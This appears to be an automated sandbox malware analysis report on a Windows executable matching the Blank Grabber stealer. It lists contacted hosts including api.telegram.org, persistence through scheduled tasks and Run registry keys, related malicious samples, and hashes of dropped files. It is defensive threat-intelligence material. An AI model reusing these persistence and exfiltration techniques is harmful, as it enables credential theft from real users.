    https://versionbadg.es/inspect-js/has-proto.svgREADME.md38.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://app.codecov.io/gh/inspect-js/has-proto/README.md38.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://nodei.co/npm/iconv-lite.png?downloads=true&downloadRank=true)README.md48.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://app.codecov.io/gh/ljharb/es-errors/README.md16.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://david-dm.org/inspect-js/has-proto/dev-status.svgREADME.md38.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://npmjs.org/package/es-errorsREADME.md16.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://github.com/ashtuchkin/iconv-lite/wiki/Use-Buffers-when-decoding).README.md48.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://img.shields.io/endpoint?url=https://github-actions-badge-u3jn4tfpocch.runkit.sh/inspect-js/hREADME.md38.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://github.com/inspect-js/has-proto/actionsREADME.md38.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://npm-stat.com/charts.html?package=has-protoREADME.md38.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://img.shields.io/endpoint?url=https://github-actions-badge-u3jn4tfpocch.runkit.sh/ljharb/es-erREADME.md16.14.drfalse
    • Avira URL Cloud: safe
    unknown
    http://www.unicode.org/Public/MAPPINGS/)README.md48.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/Vlibcurl.dll.14.drfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    208.95.112.1
    ip-api.comUnited States
    53334TUT-ASUSfalse
    149.154.167.220
    api.telegram.orgUnited Kingdom
    62041TELEGRAMRUtrue
    185.199.109.133
    raw.githubusercontent.comNetherlands
    54113FASTLYUSfalse
    140.82.121.3
    github.comUnited States
    36459GITHUBUSfalse
    185.199.111.133
    unknownNetherlands
    54113FASTLYUSfalse
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1460520
    Start date and time:2024-06-21 04:26:12 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 11m 51s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:108
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:QIjBj1l8We.exe
    renamed because original name is a hash value
    Original Sample Name:48a8ee49651a74a74baca1f7c94729e5.exe
    Detection:MAL
    Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@173/801@7/5
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:Failed
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, ShellExperienceHost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
    • Excluded IPs from analysis (whitelisted): 142.250.184.227
    • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, clientsettings.roblox.com, slscr.update.microsoft.com, fonts.gstatic.com, cdn.jsdelivr.net, j282895d.beget.tech, ctldl.windowsupdate.com, kit-pro.fontawesome.com, pastebin.com, edge.microsoft.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, cdnjs.cloudflare.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, gstatic.com, config.edge.skype.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
    • Report size getting too big, too many NtCreateFile calls found.
    • Report size getting too big, too many NtCreateKey calls found.
    • Report size getting too big, too many NtEnumerateKey calls found.
    • Report size getting too big, too many NtOpenFile calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
    • Report size getting too big, too many NtReadVirtualMemory calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
    TimeTypeDescription
    03:27:33Task SchedulerRun new task: tasklist path: "C:\Windows\ShellComponents\tasklist.exe"
    03:27:33Task SchedulerRun new task: tasklistt path: "C:\Windows\ShellComponents\tasklist.exe"
    03:27:36Task SchedulerRun new task: fontdrvhost path: "C:\Recovery\fontdrvhost.exe"
    03:27:36Task SchedulerRun new task: fontdrvhostf path: "C:\Recovery\fontdrvhost.exe"
    03:27:36Task SchedulerRun new task: seCeUYjhGIFplo path: "C:\Recovery\seCeUYjhGIFplo.exe"
    03:27:36Task SchedulerRun new task: seCeUYjhGIFplos path: "C:\Recovery\seCeUYjhGIFplo.exe"
    03:27:36Task SchedulerRun new task: StartMenuExperienceHost path: "C:\Program Files\Windows Mail\StartMenuExperienceHost.exe"
    03:27:36Task SchedulerRun new task: StartMenuExperienceHostS path: "C:\Program Files\Windows Mail\StartMenuExperienceHost.exe"
    03:27:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tasklist "C:\Users\Default\Application Data\Microsoft\Internet Explorer\Quick Launch\tasklist.exe"
    03:27:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run seCeUYjhGIFplo "C:\Recovery\seCeUYjhGIFplo.exe"
    03:27:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Recovery\fontdrvhost.exe"
    03:28:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files\Windows Mail\StartMenuExperienceHost.exe"
    03:28:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run tasklist "C:\Users\Default\Application Data\Microsoft\Internet Explorer\Quick Launch\tasklist.exe"
    03:28:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run seCeUYjhGIFplo "C:\Recovery\seCeUYjhGIFplo.exe"
    03:28:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Recovery\fontdrvhost.exe"
    03:28:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files\Windows Mail\StartMenuExperienceHost.exe"
    03:28:44AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run tasklist "C:\Users\Default\Application Data\Microsoft\Internet Explorer\Quick Launch\tasklist.exe"
    03:28:52AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run seCeUYjhGIFplo "C:\Recovery\seCeUYjhGIFplo.exe"
    03:29:00AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Recovery\fontdrvhost.exe"
    03:29:08AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files\Windows Mail\StartMenuExperienceHost.exe"
    22:27:20API Interceptor166x Sleep call for process: SolaraBootstrapper.exe modified
    22:27:23API Interceptor1x Sleep call for process: WMIC.exe modified
    22:27:24API Interceptor127x Sleep call for process: powershell.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    208.95.112.1SecuriteInfo.com.Win64.MalwareX-gen.18499.25362.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
    • ip-api.com/json
    Vista previa de consulta de compra___________pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
    • ip-api.com/line/?fields=hosting
    6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
    • ip-api.com/json/?fields=225545
    oxyinstaller.exeGet hashmaliciousXWormBrowse
    • ip-api.com/line/?fields=hosting
    Ulg Bypas.exeGet hashmaliciousAsyncRAT, XWormBrowse
    • ip-api.com/line/?fields=hosting
    X Image logger beta V5.2.exeGet hashmaliciousAsyncRAT, XWormBrowse
    • ip-api.com/line/?fields=hosting
    35,163.07.exeGet hashmaliciousAgentTeslaBrowse
    • ip-api.com/line/?fields=hosting
    QUOTATION PT INDONESIA.pdf.exeGet hashmaliciousAgentTeslaBrowse
    • ip-api.com/line/?fields=hosting
    Transaction Notification.exeGet hashmaliciousAgentTeslaBrowse
    • ip-api.com/line/?fields=hosting
    2023081922.exeGet hashmaliciousAgentTeslaBrowse
    • ip-api.com/line/?fields=hosting
    149.154.167.220http://meta-bussiness-creative-651056496516.vercel.app/Get hashmaliciousUnknownBrowse
      6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
        rRFQ_TSL104_20221024_pdf.exeGet hashmaliciousAgentTeslaBrowse
          win6.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
            win5.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
              uKzQIWsGdo.exeGet hashmaliciousNightingale StealerBrowse
                KJuctcVQbe.exeGet hashmaliciousNightingale StealerBrowse
                  CMoW3VhY2s.exeGet hashmaliciousNightingale StealerBrowse
                    Kf1Rr6jArf.exeGet hashmaliciousPhemedrone StealerBrowse
                      file.exeGet hashmaliciousUnknownBrowse
                        185.199.109.133http://memekombat-in.web.app/app/Get hashmaliciousUnknownBrowse
                          http://uniswap-v3.org-referral-program.eu/Get hashmaliciousUnknownBrowse
                            Worthingtonsteel Statement.htmlGet hashmaliciousHTMLPhisherBrowse
                              6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                setup.exeGet hashmaliciousPython Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                  Jr7B1jZMaT.exeGet hashmaliciousNovaSentinelBrowse
                                    https://github.com/Sxady/script/blob/main/corner.shGet hashmaliciousXmrigBrowse
                                      https://metacase-f-p43w.vercel.app/Get hashmaliciousUnknownBrowse
                                        https://metacase-f-lwrb.vercel.app/Get hashmaliciousUnknownBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          raw.githubusercontent.comhttp://uniswap-v3.org-referral-program.eu/Get hashmaliciousUnknownBrowse
                                          • 185.199.111.133
                                          6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                          • 185.199.109.133
                                          SpyderCrypter.exeGet hashmaliciousBazaLoaderBrowse
                                          • 185.199.110.133
                                          Jr7B1jZMaT.exeGet hashmaliciousNovaSentinelBrowse
                                          • 185.199.109.133
                                          https://github.com/Sxady/script/blob/main/corner.shGet hashmaliciousXmrigBrowse
                                          • 185.199.110.133
                                          https://ipfs.io/ipns/4-11-1.uniswap-uncensored.ethGet hashmaliciousUnknownBrowse
                                          • 185.199.110.133
                                          DriverAutomationTool (2).ps1Get hashmaliciousUnknownBrowse
                                          • 185.199.108.133
                                          DriverAutomationTool.ps1Get hashmaliciousUnknownBrowse
                                          • 185.199.111.133
                                          http://bafybeidu7lqw7ls7lcaxytltxl3vr7xk3hne5lrs22rmndx7vvc5ovsbiu.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                          • 185.199.108.133
                                          1BPAO1Hv8R.exeGet hashmaliciousPython Stealer, NexusStealerBrowse
                                          • 185.199.110.133
                                          ip-api.comSecuriteInfo.com.Win64.MalwareX-gen.18499.25362.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                          • 208.95.112.1
                                          Vista previa de consulta de compra___________pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 208.95.112.1
                                          6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                          • 208.95.112.1
                                          oxyinstaller.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          Ulg Bypas.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 208.95.112.1
                                          X Image logger beta V5.2.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 208.95.112.1
                                          35,163.07.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          QUOTATION PT INDONESIA.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          Transaction Notification.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          2023081922.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          github.comhttps://VYvlZ.eadepali.com/3bjK/#Lhttps://digify.com/abcd.ef.comGet hashmaliciousHTMLPhisherBrowse
                                          • 140.82.121.3
                                          https://i1h.nechole.ru/9Ciz/Get hashmaliciousHTMLPhisherBrowse
                                          • 140.82.121.4
                                          https://qlwcz.semoxqj.ru/jEmXeUJt/#XGet hashmaliciousUnknownBrowse
                                          • 140.82.121.4
                                          Worthingtonsteel Statement.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 140.82.121.4
                                          6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                          • 140.82.121.3
                                          invoice.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                                          • 140.82.121.3
                                          Jr7B1jZMaT.exeGet hashmaliciousNovaSentinelBrowse
                                          • 140.82.121.4
                                          api.telegram.orghttp://meta-bussiness-creative-651056496516.vercel.app/Get hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                          • 149.154.167.220
                                          rRFQ_TSL104_20221024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          win6.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                          • 149.154.167.220
                                          win5.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                          • 149.154.167.220
                                          uKzQIWsGdo.exeGet hashmaliciousNightingale StealerBrowse
                                          • 149.154.167.220
                                          KJuctcVQbe.exeGet hashmaliciousNightingale StealerBrowse
                                          • 149.154.167.220
                                          CMoW3VhY2s.exeGet hashmaliciousNightingale StealerBrowse
                                          • 149.154.167.220
                                          Kf1Rr6jArf.exeGet hashmaliciousPhemedrone StealerBrowse
                                          • 149.154.167.220
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          TELEGRAMRUhttp://naughtygroupgirls.pages.dev/Get hashmaliciousUnknownBrowse
                                          • 149.154.167.99
                                          http://meta-bussiness-creative-651056496516.vercel.app/Get hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                          • 149.154.167.220
                                          setup.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                          • 149.154.167.99
                                          setup.exeGet hashmaliciousRedLineBrowse
                                          • 149.154.167.99
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          1kBeqS7E3z.exeGet hashmaliciousLummaC, RisePro Stealer, VidarBrowse
                                          • 149.154.167.99
                                          auTs24fNru.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          https://telegradm.xyz/Get hashmaliciousTelegram PhisherBrowse
                                          • 149.154.167.99
                                          https://telegradm.vip/Get hashmaliciousTelegram PhisherBrowse
                                          • 149.154.167.99
                                          FASTLYUShttps://www.ultiqahotelsandresorts.com.auGet hashmaliciousUnknownBrowse
                                          • 151.101.194.83
                                          https://VYvlZ.eadepali.com/3bjK/#Lhttps://digify.com/abcd.ef.comGet hashmaliciousHTMLPhisherBrowse
                                          • 185.199.108.133
                                          https://onpagvus.storeGet hashmaliciousHTMLPhisherBrowse
                                          • 151.101.194.208
                                          https://wjadjeradd.blogspot.com/Get hashmaliciousUnknownBrowse
                                          • 151.101.2.208
                                          http://naughtygroupgirls.pages.dev/Get hashmaliciousUnknownBrowse
                                          • 151.101.65.229
                                          http://memekombat-in.web.app/app/Get hashmaliciousUnknownBrowse
                                          • 151.101.2.133
                                          http://aktavasi-paylater-dana.update-informasi-2024.my.id/Get hashmaliciousUnknownBrowse
                                          • 151.101.1.229
                                          http://clickvideohothotwww.blogspot.sn/Get hashmaliciousUnknownBrowse
                                          • 151.101.194.137
                                          http://theabhiichakraborty.github.io/netflix-cloneGet hashmaliciousUnknownBrowse
                                          • 185.199.108.153
                                          http://excderpb0xscom.glitch.me/Get hashmaliciousUnknownBrowse
                                          • 151.101.194.137
                                          FASTLYUShttps://www.ultiqahotelsandresorts.com.auGet hashmaliciousUnknownBrowse
                                          • 151.101.194.83
                                          https://VYvlZ.eadepali.com/3bjK/#Lhttps://digify.com/abcd.ef.comGet hashmaliciousHTMLPhisherBrowse
                                          • 185.199.108.133
                                          https://onpagvus.storeGet hashmaliciousHTMLPhisherBrowse
                                          • 151.101.194.208
                                          https://wjadjeradd.blogspot.com/Get hashmaliciousUnknownBrowse
                                          • 151.101.2.208
                                          http://naughtygroupgirls.pages.dev/Get hashmaliciousUnknownBrowse
                                          • 151.101.65.229
                                          http://memekombat-in.web.app/app/Get hashmaliciousUnknownBrowse
                                          • 151.101.2.133
                                          http://aktavasi-paylater-dana.update-informasi-2024.my.id/Get hashmaliciousUnknownBrowse
                                          • 151.101.1.229
                                          http://clickvideohothotwww.blogspot.sn/Get hashmaliciousUnknownBrowse
                                          • 151.101.194.137
                                          http://theabhiichakraborty.github.io/netflix-cloneGet hashmaliciousUnknownBrowse
                                          • 185.199.108.153
                                          http://excderpb0xscom.glitch.me/Get hashmaliciousUnknownBrowse
                                          • 151.101.194.137
                                          TUT-ASUSSecuriteInfo.com.Win64.MalwareX-gen.18499.25362.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                          • 208.95.112.1
                                          Vista previa de consulta de compra___________pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 208.95.112.1
                                          6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                          • 208.95.112.1
                                          oxyinstaller.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          Ulg Bypas.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 208.95.112.1
                                          X Image logger beta V5.2.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 208.95.112.1
                                          setup.exeGet hashmaliciousPython Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                          • 208.95.112.1
                                          35,163.07.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          QUOTATION PT INDONESIA.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          Transaction Notification.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          GITHUBUShttps://VYvlZ.eadepali.com/3bjK/#Lhttps://digify.com/abcd.ef.comGet hashmaliciousHTMLPhisherBrowse
                                          • 140.82.121.3
                                          http://memekombat-in.web.app/app/Get hashmaliciousUnknownBrowse
                                          • 140.82.114.22
                                          http://theabhiichakraborty.github.io/netflix-cloneGet hashmaliciousUnknownBrowse
                                          • 140.82.112.22
                                          https://i1h.nechole.ru/9Ciz/Get hashmaliciousHTMLPhisherBrowse
                                          • 140.82.121.4
                                          https://qlwcz.semoxqj.ru/jEmXeUJt/#XGet hashmaliciousUnknownBrowse
                                          • 140.82.121.4
                                          Worthingtonsteel Statement.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 140.82.121.4
                                          6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                          • 140.82.121.3
                                          https://github.com/psychopy/psychopy/releases/download/2024.1.5/StandalonePsychoPy-2024.1.5-win64.exeGet hashmaliciousUnknownBrowse
                                          • 140.82.121.4
                                          invoice.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                                          • 140.82.121.3
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.PWSX-gen.26878.2134.exeGet hashmaliciousAgentTeslaBrowse
                                          • 140.82.121.3
                                          • 185.199.109.133
                                          • 185.199.111.133
                                          http://hello.dashixiong875.workers.dev/Get hashmaliciousUnknownBrowse
                                          • 140.82.121.3
                                          • 185.199.109.133
                                          • 185.199.111.133
                                          http://memekombat-in.web.app/app/Get hashmaliciousUnknownBrowse
                                          • 140.82.121.3
                                          • 185.199.109.133
                                          • 185.199.111.133
                                          http://ybnwivpxga0b.pages.dev/Get hashmaliciousUnknownBrowse
                                          • 140.82.121.3
                                          • 185.199.109.133
                                          • 185.199.111.133
                                          http://ca11he1pservirums11.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                          • 140.82.121.3
                                          • 185.199.109.133
                                          • 185.199.111.133
                                          https://lbg-calcs.vercel.app/Get hashmaliciousUnknownBrowse
                                          • 140.82.121.3
                                          • 185.199.109.133
                                          • 185.199.111.133
                                          http://theabhiichakraborty.github.io/netflix-cloneGet hashmaliciousUnknownBrowse
                                          • 140.82.121.3
                                          • 185.199.109.133
                                          • 185.199.111.133
                                          http://krrkenlogin.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                          • 140.82.121.3
                                          • 185.199.109.133
                                          • 185.199.111.133
                                          http://my-site-107705-10527.square.site/Get hashmaliciousUnknownBrowse
                                          • 140.82.121.3
                                          • 185.199.109.133
                                          • 185.199.111.133
                                          http://metaumskelogin.gitbook.io/Get hashmaliciousUnknownBrowse
                                          • 140.82.121.3
                                          • 185.199.109.133
                                          • 185.199.111.133
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Program Files\Windows Mail\StartMenuExperienceHost.exe6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                            C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exe6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                              C:\Recovery\fontdrvhost.exe6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                                C:\Recovery\seCeUYjhGIFplo.exe6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:ASCII text, with very long lines (706), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):706
                                                  Entropy (8bit):5.8795280607748515
                                                  Encrypted:false
                                                  SSDEEP:12:kj572ouO2IyYQP/7AsAYY364NK4n5LJhWbnNQOJeLZaSEMlBMW0dC03:kj5CSdQP/DYq4RrOr4yd/
                                                  MD5:7CF894AEC1989FB95992D349D43506C3
                                                  SHA1:D5E3CA1C45F85911115F7F8889894085F8A1A5A1
                                                  SHA-256:BB5A2AAF0D2561814B708D39D8BABF86EC85832648930011CEA23C781F35B86A
                                                  SHA-512:E35614CF8D28C7488C67AF1548E14932C62E32BD79694537CA5F05CF2FD35B69BDC06534CFD16E875FD0184F7FC7760B2929681C0CE969E2E016192EE20A130E
                                                  Malicious:false
                                                  Preview:DLzEts0IzoOHUfIpY9bQHxu0zzFk0tAq9tdt2yI8hf4nEeyJC8q0UAkPb9P3mQSFohIlCZxj1dsl3GvUA5h2DJW8JNS2jOVRNz9gWNHnLG91S8WUN53qsaBfLJbyH4AmHaYEHP8xy4q6JfqL17onVojxxdUMvTgQGWt1jSN87G2xtEWqdQ7JPWRc1lQn5vBeYZ0wvzliuqqPwvEtHntfWWBtFQ98BjDLEXZTNj4ooYZipCqFghgRCgIBYHrfzmhKnfKYWufhsE077cDCk3bdDvJiOX4G2ZyC1O4K1RtvC8i7qLE5Do55LDH1VmK90YpTQyGti2KSKpbENL1DT9CNe20xGDzPHu5nSOr2EUXLdmvfmDoKuGp0WczX7TneD5Lauxv8d988m1t1HVLDZoeAEFR0ZU4vr2HibVvyRpruHrOes7PlHjFYbKVog5jIENRttLZvkXwu7t3X0xHcETnHxsHR9GRVGip4ZeuhhdBuxVbrR7xtxGDvjJ6BDIwdFanZD87VCk4lS3TbRZABSii9e4UPitdZrhpXrCnSAbqNMccp0euoIuLg1o4JnrxTGf3vO5tOwsB02VwBboZD9zR7VIgDHeoSoWGrirb4uf2ZsUng12r8RtUQN5ZFZqHRDtMfOFcuNfSe71PBe9LOxpA4CzdmSWeEXkW9IISva7vwb0TWqYkae3eYsRdYlzb1BOGWfQ
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4173824
                                                  Entropy (8bit):7.8287711682156464
                                                  Encrypted:false
                                                  SSDEEP:98304:0YN5zgov0Ev1wOj0EsDvoFt5mWZ1pegLaaDQojhfASjwc:0k550zE51GaDQGfo
                                                  MD5:6CF5F23F1C8CA3BC6342506BAAC300DA
                                                  SHA1:18AFFB87F0E996D202F0BE3B8109701120EA3995
                                                  SHA-256:F3EE0A31D29B515D2E0BF776507897CA3EF5605D0470ADCC4163209BA78E3445
                                                  SHA-512:66830DA8515A32F3CF03149F0B23398265CBAD452BE1E81BFBAA2FB553E607AB498B2E6D2AF06D9EC840236C2FE7D964443ED4F2AB4D9E50BD07ECF1AA70335B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                  Joe Sandbox View:
                                                  • Filename: 6tGWMkdYv4.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................v?..6.......?.. ....?...@.. ....................... @...........@...................................?.K.....?.......................@...................................................... ............... ..H............text....t?.. ...v?................. ..`.sdata.../....?..0...z?.............@....rsrc.........?.......?.............@..@.reloc........@.......?.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:ASCII text, with very long lines (909), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):909
                                                  Entropy (8bit):5.915962743897587
                                                  Encrypted:false
                                                  SSDEEP:24:2sxo4TjKxCVSrqufdkAXwA2rOpFQsD/wGU14:2QKgVSrquFkAXp4O/wI
                                                  MD5:DAC85C8235DEC96A57559857CDD62DD1
                                                  SHA1:30CCFECE27171269FE389B31D8E0778E5080FFD5
                                                  SHA-256:96F063354BA8DD419E1D0029366910C2D41CF18A11F2E491D9AF1DE9E32E0489
                                                  SHA-512:984EC2E6936975A2EB222B7177AC760EA58987CF0A57A666E47C38EA4A631F170833568FD5DD8360DA54A9FA951511B97CBA6E362BC7ADEBB59BBCA46C9FA642
                                                  Malicious:false
                                                  Preview:QfTHwBHAVymKr36yq0mkYIZHRtxEvRfjLXBwVhE1qXnPBMKsMVmZ7tfHFM0CNCPDSD9T1KdIwu4BfKGFjF2ZpFlb24rIrBnoHj67M00B2dnMzdl5GvdIKzXNcib6dUbvHQ35NI2sO0hMcYmYTvC6ifdSMteoZ3ihB2Fjjpr72u4URLvE5CnrRfMlwltenOTUR9KjSDznEFDxlJBB7asWQ1Pgpdw86NTobjCRALv2NAnMbZAnkrgNf6Eatn4zQ0r0vZVBHtAwp0JPODFQcJYOqGIffmiWR6mWTwbBD9f0quhpwyLqioWGccJoRzgeLofsNw6clDMdnhh6icsqa1ymkf40mwuOcBpCPzb92tEec2d45NGyG0ETz2Is2FzzS8Bm2ertBtyrwTKrC95Yq6Hm6VNWqtHw3PMe00CagWxXCWhfsaq2JbIW0ZphRUCSlBygHp1L7f2TItjkxroQCOmcGznbKfJMUfwAiAXCje5ojzNHzFtjqwPXYVZSCZAcWq8n7jBxUlqiT83RlgmFwjghQYmMlFAJddS20kJQE5PEFrEacIqfx5qwKbXi7yMOlhEzpAaBWWA0UbciULucYeWhxfsZMlTQtAcimOucroJb5zcs8yOvEtzGKgCKRBzvDuGT836GbRvuV5m7DAaYWhMALVYFLkLqzXYKtItE2HUw8FvO3FGQkaYfiGImf041GE47hcN4QWgPNZBFkJMGd4GY82mnAGiBNdq3Kxrb1MAN4JRJECCWoxXM8f9ozk4KxeBusI4wbuPR42dzkdi7DLXZFe5oyClQRzaaIha6HQ54iGRGBJDWC6GlHmpOMP7YI89EbDrDDmzxQd08Myno9POUsyTg2Lt1SgvjHNo8cATZHTUovqBXmSZ3uoVnuLK127eurR19KoM85yNZd
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4173824
                                                  Entropy (8bit):7.8287711682156464
                                                  Encrypted:false
                                                  SSDEEP:98304:0YN5zgov0Ev1wOj0EsDvoFt5mWZ1pegLaaDQojhfASjwc:0k550zE51GaDQGfo
                                                  MD5:6CF5F23F1C8CA3BC6342506BAAC300DA
                                                  SHA1:18AFFB87F0E996D202F0BE3B8109701120EA3995
                                                  SHA-256:F3EE0A31D29B515D2E0BF776507897CA3EF5605D0470ADCC4163209BA78E3445
                                                  SHA-512:66830DA8515A32F3CF03149F0B23398265CBAD452BE1E81BFBAA2FB553E607AB498B2E6D2AF06D9EC840236C2FE7D964443ED4F2AB4D9E50BD07ECF1AA70335B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                  Joe Sandbox View:
